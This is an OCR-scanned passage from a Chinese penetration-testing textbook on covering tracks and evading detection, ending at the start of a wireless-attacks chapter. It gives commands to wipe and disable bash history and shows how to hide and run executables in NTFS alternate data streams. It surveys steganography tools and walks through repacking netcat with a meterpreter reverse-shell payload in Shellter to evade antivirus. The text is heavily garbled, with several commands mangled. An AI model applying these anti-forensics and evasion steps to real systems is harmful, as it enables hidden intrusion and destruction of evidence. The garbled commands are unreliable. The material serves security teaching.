陷入 困境 。 在 一 些 法 庭 和 法 律 体系 中 ， 删 除 日 志文 件 的 行为 可 作为 实施 了 犯罪 的 证 据 。 


12.2.4 ” 擦 除 命 令 历史 


在 完成 Linux 系 统 测试 之 前 ， 可 以 删除 命令 历史 ， 从 而 防止 检索 到 曾经 进行 的 操作 。 
记 住 ，Linux 中 的 shell 通 常会 记录 系统 中 最 后 执行 的 那些 命令 。 知 识 渊博 的 系统 管理 员 ( 或 
鉴证 专家 ) 会 检查 你 执行 的 所 有 命令 ， 从 而 检测 和 破译 你 在 系统 上 的 行动 ， 并 可 能 将 其 用 
作证 据 。 

想 要 查看 历史 操作 ， 可 使 用 如 下 命令 : 

more ~/.bash history 

历史 文件 的 大 小 由 环境 变量 HISTSIZE 确 定 。 可 通过 输入 : 

echo SHISTSIZE 

查看 HISTSIZE 变 量 的 大 小 。 

然后 ， 可 输入 : 


export HISTSIZE=0 


现在 ， shell 将 不 存储 任何 历史 记录 。 如 果 深 谋 远 虑 ， 可 在 执行 所 有 命令 前 ， 将 该 变量 
值 更 改 为 零 ， 以 减少 后 续 清理 工作 量 。 但 如 果 不 这 样 做 ， 之 后 将 仍然 需要 将 该 变量 设置 


为 零 。 


如 果 还 想 进一步 清理 ， 可 以 粉碎 历史 文件 ， 使 它 再 无 用 处 (如 果 方 式 正确 )。 
shred ~zu Toot -bash history 


该 行 命令 使 用 带 -zu 开关 选项 的 shred 命 令 ， 用 和 零 值 覆 新 历史 记录 ， 然 后 删除 该 文件 。 
要 检查 历史 记录 是 否 已 经 被 粉碎 ， 可 通过 输入 以 下 命令 查看 历史 文件 。 


more /root/.bashhistory 


恭喜 ! 日 志文 件 现 已 从 Linux 中 删除 。 


12.3 ”隐藏 文件 


如 果 已 经 在 系统 上 植 入 了 文件 ， 有 一 些 很 好 的 方法 可 用 于 隐藏 它们 ， 以 阻止 或 迟 清 检 
测 。 诸 如 Windows 之 类 的 操作 系统 提供 了 许多 能 够 隐藏 文件 系统 中 信息 的 方法 ， 包 括 文 件 
属性 和 备用 数据 流 。 

文件 属性 是 操作 系统 的 一 个 功能 ， 它 允许 将 文件 标记 为 具有 茶 些 属性 (如 隐藏 )。 标 
记 为 隐藏 的 文件 不 会 目 动 显示 在 第 规 的 目录 列表 或 文件 管理 程序 (如 Windows 资 源 管理 器 ) 
中 。 虽 然 用 这 种 方式 隐藏 文件 并 不 能 提供 完整 保护 ， 因 为 更 高 级 的 检测 技术 可 以 发 现 用 这 
种 方式 隐藏 的 文件 。 邦 外 ， 只 需要 进行 几 次 单 击 操作 ， 很 多 文件 管理 器 会 目 动 显 示 隐 藏 的 
文件 。 

下 面 是 隐藏 数据 的 其 他 一 些 方法 。 


12.3.1 使 用 备用 数据 流 (NTFS) 隐 政文 件 


在 Windows 系 统 上 ， 使 用 一 种 鲜 有 报道 的 称 为 备用 数据 流 (Alternate Data Streams， 
ADS) 的 功能 ， 即 可 有 效 隐藏 数据 。 虽 然 NTFS 文 件 系统 很 早 就 具备 这 个 功能 ， 但 它 却 从 未 
引起 大 量 关 注 。 

该 功能 最 初 是 为 了 确保 与 Macintosh 计 算 机 的 羔 容 性 而 提供 的 ， 但 它 已 被 用 于 其 他 用 
途 ， 例 如 本 文 所 述 的 这 种 。ADS 提 供 了 在 现 有 文件 中 隐藏 文件 数据 的 能 力 ， 而 不 会 以 任何 
方式 改变 文件 的 外 观 或 行为 。 当 使 用 ADS 时 ， 文 件 可 以 避 开 所 有 传统 检测 技术 以 及 dir 命 令 
和 Windows 资 源 管理 器 的 检测 。 

实际 上 ， ADS 的 应 用 是 一 个 重大 安全 问题 ， 因 为 它 近乎 是 一 种 完美 的 数据 隐藏 机 
制 。 在 使 用 ADS 佣 入 并 隐藏 一 份 数据 后 ， 它 可 以 一 直 保持 隐藏 ， 等 待 着 后 续 攻 击 者 决定 运 


行 它 。 


渗透 出 坛 入 门 实战 


练习 12.1: 创建 备用 数据 流 

本 练习 将 介绍 如 何在 Windows 中 使 用 备用 数据 流 。 完 成 练习 后 ， 即 可 学 会 如 何 利 
用 ADS 来 隐藏 文件 。 

创建 ADS 的 过 程 很 简单 。 只 需要 输入 : 

triforce .exe> smoke .doc:triforce exe. 

执行 此 命令 将 读 取 文件 triforce.exe， 并 将 其 隐藏 在 文件 smoke.doc 之 中 。 

此 时 ， 该 文件 就 变 成 流 式 的 。 下 一 步 则 是 删除 刚刚 隐藏 的 原始 文件 ， 也 就 是 
triforce.exeo 

作为 攻击 者 ， 要 获取 该 文件 非常 向 单 ， 只 需要 输入 : 

Start smoke .doc:triforce .exe 


该 俞 令 具有 打开 隐藏 的 文件 并 执行 它 的 功能 。 


作为 防御 者 ， 这 似乎 是 个 坏 消 息 ， 因 为 以 这 种 方式 隐藏 的 文件 用 大 多 数 手 段 无 法 检 
测 。 但 是 使 用 一 些 先 进 的 方法 可 以 检测 到 它们 。 可 以 使 用 的 一 些 工 具 包括 : 

Sfind 一 个 用 于 查找 流 文件 的 取证 工具 

Streams 用 于 查找 ADS 流 文件 

StreamArmour 用 于 检测 ADS 的 开源 软件 

关于 ADS， 本 书 要 说 明 的 一 点 是 ， 仅 仅 因为 使 用 ADS 可 以 在 系统 中 隐藏 文件 ， 并 不 能 
说 明 这 是 一 个 “ 收 恶 ”功能 。 相 反 ， 出 于 完全 正当 的 原因 也 可 以 使 用 该 功能 (就 像 本 书 已 
经 介绍 的 许多 技术 一 样 )。 对 于 Windows ADS 而 言 ， 琅 和 Office 用 该 功能 确定 文件 从 何人 处 下 
载 。 是 否 曾 有 过 疑问 ， 为 何 Word、Excel 或 其 他 应 用 程序 ， 可 以 很 容易 地 知道 文件 是 从 网 
上 而 不 是 从 本 地 驱动 器 上 下 载 的 ? 这 是 因为 ， 摘 述 文件 获取 来 源 的 信息 是 存储 在 文件 附带 
的 ADS 中 。 根 据 在 ADS 中 记录 的 内 容 ， 文 持 ADS 的 应 用 程序 ， 例 如 Word， 即 可 读 取信 息 
并 采取 适当 的 操作 (对 于 Word 或 Excel， 该 文件 将 以 只 读 方 式 打 开 )。 

ADS 是 一 种 称 为 分 叉 文 件 系统 (forked filesystem) 的 概念 的 一 种 实现 方式 。 该 概念 已 出 
现 了 很 长 一 段 时 间 ， 并 且 和 存在 于 过 去 20 年 中 发 布 的 许多 文件 系统 和 操作 系统 中 。 使 用 这 种 
文件 系统 的 目的 是 将 数据 和 元 数据 分 开 存 储 。 例 如 ， 一 个 文件 可 以 将 其 数据 存储 在 文件 系 
统 中 ， 也 就 是 出 现在 目录 或 文件 夹 列表 中 ， 代 表 文 件 的 内 容 。 但 与 之 链接 的 是 元 数据 ， 这 
些 数据 描述 了 该 文件 的 作者 和 来 源 以 及 其 他 一 些 信息 。 

有 关 ADS 和 分 又 文件 系统 还 有 一 点 值得 讨论 : Linux 确 实 有 一 个 被 称 为 扩展 文件 属性 
的 功能 ， 上 有 具有 类 似 的 目的 。 然 而 ， 尽 管 操作 系统 支持 该 功能 ， 但 就 像 Windows 一 样 ， 它 不 
文 持 大 型 文件 一 一 超过 64KB 的 文件 无 法 使 用 该 特性 。 最 后 ， 虽 然 Linux 文 持 该 功能 ， 但 它 
只 在 (Linux 人 允许 使 用 的 文件 系统 中 的 ) 文 持 该 功能 的 数 种 文件 系统 上 这 人 么 做 。 
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12.3.2 ”用 隐 与 术 隐 疡 文件 


隐藏 文 件 的 另外 一 种 方式 是 采用 一 种 称 为 隐 写 术 (Steganography) 的 流程 。 该 流程 不 是 
一 种 新 的 方法 ， 而 是 一 种 被 数字 时 代 吸 收 的 老 方 法 。 使 用 这 种 技术 ， 可 以 将 字面 上 的 任何 
东西 ， 包 括 可 执行 文件 和 任何 其 他 信息 ， 隐 藏 到 众 目 瞬 瞬 之 下 ， 而 人 人 熟视无睹 。 

在 深入 说 明之 前 ， 首 先 强调 一 下 加 密 和 隐 写 术 之 间 的 区 别 。 加 密 是 将 一 段 明 文 转换 为 
密 文 ， 即 不 可 读 的 文本 ， 以 防止 原始 消息 被 泄露 给 未 授权 方 。 加 密 不 做 什么 ? 加 密 不 会 阻 
止 任何 人 理解 正在 传输 的 信息 ， 因 为 ， 加 密 数 据 可 能 被 拦截 和 检查 。 但 是 ， 没 有 最 为 重要 
的 密 钥 ， 密 文 是 无 法 被 轻易 破译 的 。 

现在 对 比 一 下 隐 和 写 术 的 流程 。 在 该 流程 中 ， 数 据 被 隐藏 在 其 他 信息 中 ， 这 样 ， 不 知道 
这 个 秘密 的 人 束 无 法 意识 到 有 数据 隐藏 在 其 中 。 如 图 12.4 和 图 12.5 的 两 张 图 片 所 示 : 其 中 
之 一 是 原始 图 像 ， 另 外 一 个 则 内 入 了 一 个 PDF 文件 。 只 用 肉眼 能 看 出 区 别 吗 ? 答案 是 否 
定 的 。 


本 
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隐 写 术 的 另 一 个 例子 如 图 12.6 和 图 12.7 所 示 。 


Pi hy, 


图 12.7 藏 有 Word 文 档 的 文件 

为 什么 使 用 隐 写 术 而 不 是 标准 的 加 密 协 议 ? 大 致 上 是 因为 ， 如 果 将 消息 加 密 进 行 传 
输 ， 会 引起 那些 你 希望 对 其 保守 秘密 的 人 的 不 必要 注意 ， 而 使 用 隐 写 术 ， 就 可 以 在 第 三 方 
的 眼皮 底下 发 送信 息 ， 而 几乎 不 会 引起 怀疑 。 

1. 隐 写 术 实 践 

接 下 来 将 介绍 整个 隐 写 流程 如 何 工 作 一 一 如 果 没 有 任何 入 门 知 识 ， 可 能 难以 理解 。 


在 此 用 一 个 JPEG 文 件 作 为 一 个 普通 文件 的 例子 。 由 于 它们 的 多 功能 性 和 受到 广泛 文 
持 ， 并 且 还 能 支持 丰富 的 色彩 ，JPEG 文 件 自 20 年 前 推出 以 来 ,一直 非常 受 欢迎 。 一 张 使 
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用 高 于 平均 水 平 或 高 端的 照相 机 拍摄 的 标准 数码 照片 ， 由 于 其 中 有 大 量 颜色 信息 ， 可 以 很 
容易 地 包含 大 量 数据 。 

除了 第 规 信 息 外 ， 大 多 数 照 片 中 还 会 包含 数量 不 同 的 称 为 白 噪 声 (white noise) 的 
日 噪声 表示 任何 数据 中 包含 的 背景 或 随机 信息 。 使 用 隐 写 术 ， 可 以 利用 这 种 噪声 ， 以 
不 容易 被 人 注意 到 的 方式 ， 更 改 信息 以 隐藏 “秘密 ”。 

那么 ， 如 何 执行 这 一 流程 呢 ? 目前 ， 有 很 多 工具 可 用 于 执行 该 过 程 : 

Hiding Glyph ”该 应 用 程序 用 于 在 一 个 标准 的 、 非 压缩 的 、24 位 (或 更 高 色 深 ) 的 位 图 
图 像 中 存储 一 个 或 一 组 文件 。 该 应 用 程序 的 优点 是 ， 可 以 选择 任何 包含 合理 的 颜色 变化 的 
图 像 ， 作 为 隐藏 文件 使 其 免 于 被 检测 的 容器 。 

mp3stego 可 以 使 用 mp3stego 将 数据 隐藏 在 大 小 与 原始 数据 大 小 成 正比 的 MP3 文 件 
中 。 基 本 上 ， 过 程 是 这 样 的 : 获取 一 个 WAV 文 件 ， 将 数据 隐藏 在 其 中 ， 然 后 将 WAV 文 件 
压缩 为 一 个 MP3 文 件 。 采 用 这 种 格式 的 好 处 是 ， 可 以 方便 地 将 任意 类 型 的 数据 隐藏 在 一 种 
平凡 无 奇 的 格式 中 。 

Hide lt In ”这 是 一 个 专 为 iPhone 设计 的 应 用 程序 ， 可 将 手机 摄像 头 拍摄 的 照 上 请 隐藏 在 
己 存 储 在 手机 中 的 图 像 中 。 

QuickStego 它 是 一 个 免费 的 应 用 程序 ， 可 以 将 文本 隐藏 在 图 片 中 ， 只 有 QuickStego 
的 用 户 才 能 阅读 隐藏 的 文本 信息 。 文 本 可 以 通过 输入 或 从 TXT 文件 加 载 。 该 应 用 程序 支持 
BMP、JPG、JPEG 和 GIF 输入 图 像 格式 ， 但 将 图 像 以 BMP 格式 输出 ， 并 在 其 中 隐藏 文本 。 

Xiao Steganography 它 是 一 个 免费 软件 ， 可 采用 将 秘密 文件 隐藏 在 BMP 图 像 或 
WAV 文 件 中 ， 且 支持 加 密 。 可 以 选择 一 个 BMP 或 WAV 文 件 作 为 目标 文件 ， 并 将 载荷 加 载 
到 文件 本 体 之 中 。 

OpenStego 这 是 一 个 小 巧 紧 凑 的 应 用 程序 ， 可 执行 一 系列 隐 写 术 操 作 。 可 以 加 伪装 
文件 附加 任何 类 型 的 秘密 消息 文件 。 该 程序 支持 的 伪装 文件 类 型 包括 BMP、GIF、JPEG、 
JPG、PNG 和 WBMP。 

Camouflage “该 软件 可 在 任意 类 型 的 文件 中 隐藏 任意 类 型 的 文件 。 例 如 ， 可 以 将 一 
个 秘密 TXT 文件 隐藏 在 标准 JPEG 图 像 中 。 合 成 文件 可 称 为 “迷彩 (camouflaged)” 文 件 ， 其 
外 观 和 行为 与 普通 文件 无 二 。 

DeepSound 该 隐 写 术 工 具 在 Windows 平 台 上 免费 可 用 。 它 可 将 各 种 类 型 的 文件 隐藏 
在 WAV 或 FLAC 音 频 文 件 中 。 可 对 加 密 文 件 应 用 密码 ， 并 选择 输出 音频 文件 的 质量 。 

Steganos Privacy Suite 该 应 用 程序 包 是 一 个 商业 软件 套件 ， 包 括 一 个 隐 写 术 工 具 
箱 以 及 其 他 用 于 隐藏 踩 迹 的 工具 。Steganos Privacy Suite 可 以 选择 一 个 现 有 文件 并 在 其 中 
散 入 数据 ， 或 者 创建 一 个 图 像 或 声音 文件 用 于 承载 数据 。 该 套件 可 连接 扫描 仪 或 麦克 风 附 
件 ， 以 创建 载体 文件 。 


2. 检测 隐 瑟 术 


对 抗 隐 写 术 的 手段 是 一 种 被 称 为 隐 写 分 析 (steganalysis) 的 技术 。 隐 和 写 分 析 技 术 可 用 于 
检测 可 疑 数 据 ， 确 定数 据 中 是 否 隐 藏 有 信息 ， 并 恢复 数据 。 

检测 隐 写 术 最 简单 的 形式 ， 是 通过 使 用 统计 分 析 的 方法 进行 隐 写 分 析 。 该 技术 采用 的 
是 将 已 知 未 修改 的 文件 与 可 疑 文 件 相 比较 的 方法 ， 其 思路 是 将 已 知 文件 的 “指纹 ”与 可 疑 
文件 进行 比较 。 理 论 上 ， 通 过 这 种 统计 比较 ， 可 以 检测 正常 生成 文件 的 改变 。 关 键 之 处 在 
于 ， 原 始 文件 与 可 疑 文件 的 来 源 ( 即 数码 相机 或 扫描 仪 ) 必 须 一 致 ， 或 者 尽 可 能 接近 匹配 ， 
比较 结果 才能 有 效 。 该 技术 的 一 些 变种 则 寻找 JPEG、MP3 和 其 他 文件 中 采用 的 已 知 压 
缩 算法 的 数据 变化 ， 因 为 这 些 压缩 算法 是 公开 的 。 对 两 幅 图 像 的 统计 分 析 结 果 如 图 12.8 
所 示 。 


0 5 10 15 六 -20 =15 =10 -5 
像素 差 什 像素 差 值 
图 12.8 ”对 两 幅 含有 隐藏 数据 的 图 像 的 分 析 结果 
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男 一 种 用 于 检测 被 隐 写 术 修改 以 承载 数据 的 文件 的 技术 ， 是 通过 分 析 对 文件 所 做 的 更 
改 。 有 许多 具备 几 种 不 同形 式 的 程序 ， 可 以 分 析 给 定 文件 夹 或 目录 中 的 一 组 文件 ， 并 识别 
出 更 改 了 任意 给 定数 据 块 的 工具 。 在 扫描 某 个 文件 并 将 其 与 一 个 已 知 工 具 及 其 工作 方式 的 
数据 库 比 较 后 ， 程 序 将 标记 该 文件 ， 以 便 用 户 进行 进一步 的 分 析 。 

关于 隐 写 分 析 技 术 要 谨 记 的 是 : 可 以 进一步 增加 隐藏 数据 检测 的 复杂 度 。 可 如 此 考 
虑 : 如 果 想 为 隐藏 的 数据 增加 男 一 种 保护 要 素 ， 可 在 欣 入 数据 之 前 对 数据 进行 加 密 。 在 这 
种 情况 下 ， 即 使 成 功 检 测 到 隐藏 的 数据 ， 也 必须 执行 解密 操作 。 


12.4 规避 防 病毒 软件 检测 


入 侵 系 统 时 遇 到 的 最 大 障碍 之 一 就 是 目标 系统 中 的 防 病毒 软件 。 虽 然 并 非 所 有 系统 都 
安装 了 防 病毒 应 用 程序 ， 但 是 必须 假设 系统 中 存在 防 病毒 应 用 程序 ， 它 会 问 系 统 所 有 者 发 
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出 警报 ， 告 知 攻 击 者 正在 采取 行动 。 考 虑 到 这 一 点 ， 在 此 简要 介绍 一 下 ， 如 何 应 对 这 一 
问题 。 

可 用 于 规避 防 病 毒 软件 检测 的 方法 包括 : 

从 入 开 始 制作 自己 的 病毒 ”这 种 方法 最 耗 时 ， 但 也 是 最 有 用 、 最 可 靠 地 将 一 个 有 效 亚 
意 软件 植 入 系统 中 的 方式 方法 。 如 有 果 完 全 从 头 开 始 制作 一 个 恶意 软件 ， 只 要 足够 小 心 并 进 
行 大 量 测试 ， 即 可 轻松 绕 过 茶 个 目标 的 防御 一 一 防 病毒 软件 可 能 从 未 见 过 它 ， 因 而 不 会 对 
其 作出 反应 。 

使 用 Evade 等 第 三 方程 序 修改 恶意 软件 包 ”使 用 Evade 程 序 可 以 改变 现 有 恶意 软件 的 
大 小 和 特征 ， 这 意味 着 使 其 更 难以 发 现 。 

修改 现 有 的 恶意 软件 ”实际 情况 是 ， 在 互联 网 上 可 以 找到 大 量 以 编译 后 和 未 编译 形式 
存在 的 恶意 软件 ， 利 用 后 者 ， 黑 客 可 以 获得 源 代码 并 创建 茶 个 现 有 恶意 程序 家 族 的 一 个 新 
变种 。 如 果 做 法 正确 ， 会 得 到 一 些 不 同 的 软件 ， 其 差异 大 到 足以 被 扫描 仪 发 现 。 由 于 大 多 
数 (如 果 不 是 全 部 ) 防 病毒 软件 都 要 部 分 依赖 于 一 个 已 知 病毒 、 蠕 虫 和 其 他 有 害 对 象 的 数据 
库 ， 因 此 ， 有 可 能 通过 充分 修改 现 有 代码 使 其 在 库 中 没有 匹配 项 ， 因 而 不 会 被 检测 到 。 

使 用 病毒 制作 工具 包 ”这些 工具 包 只 需要 按 下 一 个 按钮 即 可 创建 现 有 家 族 的 变种 。 虽 
然 这 种 方法 非常 简单 方便 ， 但 是 使 用 工具 有 易于 捕捉 的 缺 点 ， 从 而 导致 它们 规避 现 有 检测 
机 制 的 有 效 性 大 大 降低 。 

在 将 一 个 恶意 软件 成 功 植 入 一 个 站 后 并 运行 后 ， 它 就 可 以 执行 其 及 脏 的 工作 。 尽 管 规 
避 是 通过 防御 措施 的 关键 环节 ， 但 次 要 和 和 额外 的 行动 通常 采用 类 似 停 用 防火 墙 或 反 病 毒 / 
恶意 软件 的 方式 ， 允 许 采 取 攻 击 性 强烈 得 多 的 行动 。 

此 类 操作 之 一 是 通过 采用 诸如 netcat、Cryptcat 甚 至 sbd( 某 种 程度 上 它 是 一 种 netcat 的 克 
隆 ) 等 实用 程序 植 入 后 门 。 练 习 12.2 说 明了 如 何 使 用 Shellter 软 件 规避 防 病毒 软件 ， 并 设置 
一 个 后 门 。 


练习 12.2: 练习 Shelliter 

在 本 练习 中 将 使 用 Shellter 工 具 打 包 netcat 并 植 入 一 个 系统 中 ) 以 打开 一 个 后 门 
程序 。 

请 注意 ， 在 某 些 版 本 的 Windows 中 ， 可 能 必须 禁用 Windows Security(Windows 安 
全 ) 才 能 完成 此 安装 。 

Shellter 用 于 重新 编码 或 重新 打包 32 位 的 单 体 Windows 应 用 程序 ， 使 得 它们 可 以 
绕 过 防 病毒 保护 。 该 程序 可 从 https://www.shellterproject.com/ 人 免费 下 载 。 对 本 练习 而 
言 ， 需 要 下 载 并 安装 其 Windows 版 本 。 此 外 ， 还 需要 从 sectools.org 下 载 netcat。 

(1) 在 Windows 资 源 管理 器 中 ， 将 netcat 可 执行 文件 复制 到 解压 缩 的 Shellter 应 用 
程序 文件 夹 中 。 

(2) 双击 Shellter 应 用 程序 启动 Shellter， 它 将 调 出 Shellter 界 面 。 


(3) 在 Shellter 应 用 程序 中 ， 在 命令 提示 符 中 选择 “A”( 目 动 )。 
(4) 出 现 提示 时 , 选择 “N”。 
(5) 当 提 示 输 入 要 重新 编码 的 文件 名 称 时 ， 


输入 netcat 可 执行 文件 的 名 称 ， 通 党 
为 netcat.exe 或 nc.exe。 如 果 未 将 该 可 执行 文件 复制 到 Shellter 所 在 的 文件 夹 中 ， 则 必须 
输入 文件 的 完整 路 径 。 

(6) 过 几 分 钟 ， 系 统 会 提示 你 选择 要 通信 的 载 千 类型。 该 载 何 将 把 获取 Shell 的 
攻击 代码 (也 称 为 shellcode) 藤 入 到 打包 的 可 执行 文件 中 。 当 受害 者 运行 该 可 执行 文件 
时 ， 此 代码 将 运行 。 出 现 提 示 时 ， 对 载 何 选择 选项 1 ， 即 “meterpreter reverse tecp” 
载 集 。 

(7) 当 提 示 LHOST( 本 地 主机 )IP 和 LPORT( 端 口 ) 时 ， 
端口 。 

(8) 按 回 车 键 。 

之 后 ，Shellter 将 完成 并 验证 文件 ， 并 完成 该 过 程 。 现 在 ,已 经 获得 了 一 个 完整 
的 可 以 规避 防 病毒 软件 的 文件 。 

为 了 测试 该 新 文件 ， 可 以 使 用 防 病 毒 应 用 程序 来 扫 摘 文件 或 使 用 在 线 病毒 扫 摘 
服务 。 请 注意 ， 必 须 用 多 个 防 病毒 应 用 程序 对 该 文件 进行 检查 ， 因 为 一 个 防 病毒 应 
用 程序 可 能 检测 不 到 载 傈 ， 但 另 一 个 可 能 会 检测 到 。 


短 入 本 地 机 需 的 也 和 所 需 的 


在 制作 恶意 软件 过 程 中 ， 规 避 防 病毒 软件 或 在 系统 上 安装 制作 的 后 门 的 做 法 称 为 一 个 
隐蔽 通道 (covert channel)。 

在 使 用 恶意 软件 时 ， 应 该 了 解 隐蔽 通道 和 公开 通道 的 术语 。 两 者 的 区 别 在 于 ， 公 开通 
道 是 设计 好 的 ， 代 表 了 使 用 系统 或 流程 的 合法 或 预期 的 方式 ， 而 隐蔽 通道 则 以 某 种 非 预期 
的 方式 使 用 系统 或 进程 。 

在 本 章 中 讨论 的 这 些 方法 中 ， 隐 写 术 是 一 个 被 认为 属于 隐蔽 通道 的 方法 。 如 果 没 有 经 
过 仔细 检查 ， 人 们 不 会 认识 到 图 像 、 视 频 文件 或 音频 文件 在 其 正常 功能 之 外 还 携带 有 其 他 
载 茶 (例如 : 人 们 认为 一 幅 图 片 应 该 包含 视觉 信息 和 属性 ， 而 不 应 该 有 其 他 东西 )。 

特洛伊 木马 是 另外 一 个 很 好 的 例子 。 特 洛 伊 木 马 的 设计 目的 是 ， 在 发 送信 息 或 者 接收 
从 别处 发 出 指令 的 同时 ， 隐 藏 到 视线 之 外 。 使 用 隐 税 通道 ， 意 味 着 信息 和 通信 有 可 能 绕 过 
那些 没有 和 针对 感知 和 检测 此 类 行为 设计 或 定位 的 检测 机 制 |。 


12.5 通过 后 门 规避 防御 


许多 攻击 者 通过 后 门 访问 他 们 的 目标 系统 。 通 过 这 种 方式 攻击 系统 ， 其 所 有 者 可 能 对 
他 人 正在 使 用 系统 毫 无 感觉 。 有 关 留 下 后 门 的 更 多 信息 ， 请 参阅 第 9 章 “使 用 后 门 和 恶意 


软件 维持 访问 ”。 
在 实践 中 ， 后 门 通常 实现 以 下 若干 个 关键 目标 ; 
@ 通过 在 系统 防御 中 打开 “孔洞 ”， 使 得 攻击 者 可 以 绕 过 系统 中 的 对 抗 手段 。 
@ 提供 持续 反复 访问 系统 的 能 力 ， 同 时 躲避 在 正常 活动 的 视野 之 外 。 使 得 攻击 者 可 
以 访问 系统 并 规避 日 志 记录 和 其 他 防御 机 制 。 
@ 提供 在 最 短 的 时 间 内 简便 访问 系统 的 能 力 。 在 适当 条 件 下 ， 后 门 可 以 使 得 攻击 者 
保持 对 系统 访问 的 能 力 ， 不 需要 再 次 入 侵 。 
以 下 是 一 些 常见 的 后 门 。 
密码 破解 后 门 ” 此 类 中 的 所 有 后 门 都 依赖 于 发 现 并 利用 弱 密 码 或 弱 密 码 体 系 来 访问 
系统 。 
进程 隐藏 后 门 ”希望 尽 可 能 长 时 间 不 被 发 现 的 攻击 者 通常 会 选择 采取 额外 步骤 来 隐藏 
他 们 正在 运行 的 软件 。 诸 如 被 攻陷 的 服务 、 密 码 破解 程序 、 嗅 探 器 和 rootkit 等 类 程序 是 攻 
击 者 将 配置 以 避免 被 检测 和 删除 的 项 目 。 采 用 的 方法 包括 将 软件 重 命名 为 某 个 合法 程序 的 
名 称 ， 以 及 修改 系统 上 其 他 文件 的 名 称 ， 以 防止 其 被 检测 到 并 运行 。 
在 后 门 部 署 到 位 后 ， 攻 击 者 就 可 以 随心 所 欲 地 访问 和 操控 系统 。 


12.6 ”使 用 rootkit 进 行规 避 


最 后 值得 一 提 的 高 效 规避 工具 是 一 类 被 称 为 rootkit 的 恶意 软件 。 和 病毒 、 蠕 虫 等 一 
样 ，rootkit 在 恶意 软件 中 占有 一 席 之 地 。 在 所 有 形式 的 恶意 软件 中 ， 它 们 往往 是 最 让 人 讨 
厌 的 ， 但 同时 也 是 一 种 非常 强大 的 规避 检测 机 制 的 武器 。 有 关 如 何 安装 rootkit 的 信息 ， 请 
参阅 第 9 章 。 

基本 上 ，rootkit 是 一 种 安装 在 系统 中 之 后 很 难 被 系统 所 有 者 检测 到 的 软件 应 用 程序 。 
在 rootkit 安 装 就 位 后 ， 它 就 能 从 根本 上 改变 系统 并 且 干 扰 其 中 运行 的 各 种 进程 和 应 用 程 
序 。 这 就 意味 着 ， 在 系统 中 安装 rootkit 后 ， 它 就 可 以 执行 欺骗 防 病毒 软件 (通过 干扰 其 检测 
恶意 软件 的 能 力 ) 之 类 操作 。rootkit 还 可 以 在 系统 上 打开 其 他 “ 门 径 ”， 从 而 使 得 进一步 攻 
击 成 为 可 能 。 

能 检测 到 rootkit 吗 ? 是 的 ， 可 使 用 某 些 类 型 的 防 病毒 软件 、rootkit 检 测 程序 和 基于 主 
机 的 入 侵 检 测 系 统 (Host-based Intrusion Detection System，HIDS) 检 测 它们 。 


12.7 ”本 普 小 结 


本 章 学 习 了 一 些 可 以 掩盖 曾 进行 的 攻击 行为 的 证 据 的 方法 。 通 过 应 用 各 种 类 型 的 方 
法 ， 有 可 能 延迟 或 者 规避 检测 ， 并 使 得 后 续 攻 击 或 主要 攻击 更 为 成 功 。 

使 用 诸如 关闭 审核 的 方法 来 清理 之 前 的 工作 痕迹 可 能 有 效 。 受 害 者 在 日 志 中 找 不 到 攻 
击 证 据 ， 因 此 不 得 不 采取 更 加 广泛 和 详细 的 方法 以 检测 恶意 行为 。 但 是 ， 如 前 所 述 ， 关 闭 
日 志 记 录 过 程 可 能 是 危险 的 行为 ， 因 为 系统 中 没有 任何 活动 的 证 据 ， 无 论 如 何 看 起 来 都 是 
很 可 疑 的 。 相 反 ， 在 大 多 数 情况 下 ， 选 择 性 地 删除 事件 可 能 是 更 好 的 选择 。 

本 章 介 绍 的 另 一 种 方法 是 备用 数据 流 (ADS)。ADS 的 优点 是 可 以 在 每 一 个 Windows 系 
统 上 使 用 ， 还 有 一 个 优点 是 ， 大 多 数 人 不 知道 这 个 功能 的 存在 。 通 过 使 用 该 功能 ， 可 以 轻 
易 地 在 系统 上 隐藏 软件 或 其 他 项 目 ， 并 避 开 检测 。 由 于 该 功能 是 Windows 的 标准 部 分 ， 因 
此 ， 当 其 被 检测 到 时 ， 不 会 被 判别 为 攻击 或 恶意 行为 。 

最 后 ， 我 们 研究 了 隐 写 术 ， 使 用 它 可 以 在 其 他 数据 中 隐藏 数据 ， 使 得 那些 不 知道 该 数 
据 存 在 的 人 几乎 无 法 察觉 。 通 过 使 用 图 像 、 音 频 、 视 频 或 其 他 数据 ， 可 以 将 间谍 软件 或 其 
他 软件 打包 进 载体 里 ， 绕 过 防御 方 的 对 抗 措施 ， 然 后 提取 并 执行 攻击 。 


1. 规避 操作 有 何 目的 ? 

2. 何 为 备用 数据 流 ? 

3. 与 加 密 技术 相 比 ， 使 用 隐 写 术 有 何 好 处 ? 
4. 为 何 要 使 用 Log Parser Lizard? 


探测 和 攻击 无 线 网 络 


在 渗透 测试 过 程 中 除了 标准 的 有 线 网 络 ， 也 会 遇 到 很 多 无 线 网 络 和 设备 。 因此 ， 必 
须 熟 知 无 线 网 络 的 原理 和 工作 方式 ， 以 及 可 能 在 渗透 测试 中 用 于 攻击 它们 的 方法 。 

无 线 技术 能 够 将 公司 的 网 络 扩展 到 有 线 网 络 无 法 或 不 易 到 达 的 地 方 。 现在 ,无 线 网 
络 的 应 用 可 以 很 容易 地 扩展 到 非 传 统领 域 ， 如 咖啡 店 、 酒 店 、 图 书馆 、 人 公园、 大 厅 、 商 场 
和 餐馆 等 。 这 一 更 三 的 覆盖 范围 ， 以 及 访问 、 易 于 部 署 、 独 特 的 安全 性 和 设置 要 求 等 问 
题 ， 使 无 线 网 络 成 为 攻击 的 主要 目标 之 一 。 


本 章 将 学 习 : 
名 ”攻破 无 线 加 密 技术 
人 进行 wardriving 攻 击 
”攻击 物 联 网 


13.1 无 线 网 络 人 简介 


无 线 网 络 (Wi-Fi) 是 与 不 同 频率 的 无 线 网 络 及 其 功能 相关 的 一 组 技术 的 统称 。 当 前 几乎 
所 有 的 数码 小 玩意 、 设 备 和 家 用 电器 都 包含 无 线 网 络 技术 。 无 线 可 能 是 你 的 数码 小 玩意 或 
设备 所 具有 的 唯一 网 络 技术 ， 而 有 线 网 络 对 于 许多 系统 只 是 可 选项 。 

与 传统 的 有 线 网 络 相 比 ， 无 线 技术 在 提供 方便 的 同时 也 增加 了 ( 茶 些 情况 下 是 极 大 地 
增加 了 了) 风险。 攻击 者 们 早已 发 现 ， 无 线 网 络 比 有 线 网 络 更 易于 定位 和 渗透 ， 因 此 ， 许 多 
公司 放 慢 了 无 线 网 络 的 实施 速度 ， 或 者 没有 必要 将 上 自身 暴露 于 安全 风险 之 中 。 

当然 ， 每 种 技术 都 有 人 缺 扣 ， 无 线 网 络 也 不 例外 : 

